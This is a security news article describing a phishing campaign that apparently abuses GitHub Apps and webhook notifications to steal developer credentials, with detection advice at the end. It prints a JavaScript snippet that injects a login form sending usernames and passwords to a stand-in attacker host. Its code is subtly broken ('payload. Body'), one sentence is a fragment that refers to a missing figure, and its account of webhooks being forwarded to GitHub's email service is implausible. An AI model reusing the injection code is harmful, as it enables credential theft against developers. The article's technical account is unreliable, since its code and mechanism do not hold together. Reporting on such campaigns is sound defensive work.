Hackers Abusing GitHub Notifications to Deliver Phishing Emails

In recent weeks, security researchers have uncovered an elaborate phishing campaign that leverages legitimate GitHub notification mechanisms to deliver malicious content.

Victims receive seemingly authentic repository alerts, complete with real-looking commit messages and collaborator updates. Upon closer inspection, the notification headers reveal altered sender addresses and obfuscated links.

The campaign’s sophistication has allowed it to slip past many email gateways, leading to a surge in compromised credentials among developers and IT staff.

Initial reports emerged when multiple open-source maintainers reported unexpected password resets and unauthorized repository forks. H4x0r.DZ identified the malware variant responsible for intercepting GitHub webhook notifications and appending phishing payloads.

Unlike typical phishing emails, these messages maintain valid DKIM and SPF records by exploiting misconfigurations in third-party GitHub Apps.

Recipients clicking the embedded link are redirected through a chain of URL shorteners before landing on a credential-harvesting page.

Analysis of the phishing emails shows that the malware injects custom HTML forms into the GitHub notification template.

The form’s action attribute points to a URL under the attacker’s control, while JavaScript code captures the entered credentials and relays them via an AJAX POST request.

Infection Mechanism via Webhook Manipulation

The core infection vector hinges on compromised GitHub Apps with overly broad webhook permissions.

Attackers first identify popular repositories that allow external Apps to subscribe to push events.

By registering a malicious App under a plausible name, they gain event subscriptions and acquire a webhook secret.

The attacker’s server validates incoming JSON payloads using the secret, then modifies the “pusher” field to insert malicious HTML before forwarding the notification to GitHub’s email service.

A simplified version of the injection logic appears below:-

function modifyPayload(payload) {
  let template = payload. Body;
  const phishingForm = `<form action="https://evil.example.com/collect" method="POST">
    <input name="username" placeholder="User Name"/>
    <input type="password" name="password" placeholder="Password"/>
    <button type="submit">Confirm</button>
  </form>`;
  payload. Body = template.replace('</div>', `${phishingForm}</div>`);
  return payload;
}

While the webhook injection flow traces the end-to-end manipulation of webhook payloads. Once credentials are harvested, attackers can access private repositories, escalate privileges, and deploy further malware.

Detection strategies should focus on monitoring unusual webhook registrations, validating App permission scopes, and inspecting outbound email content for embedded forms.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.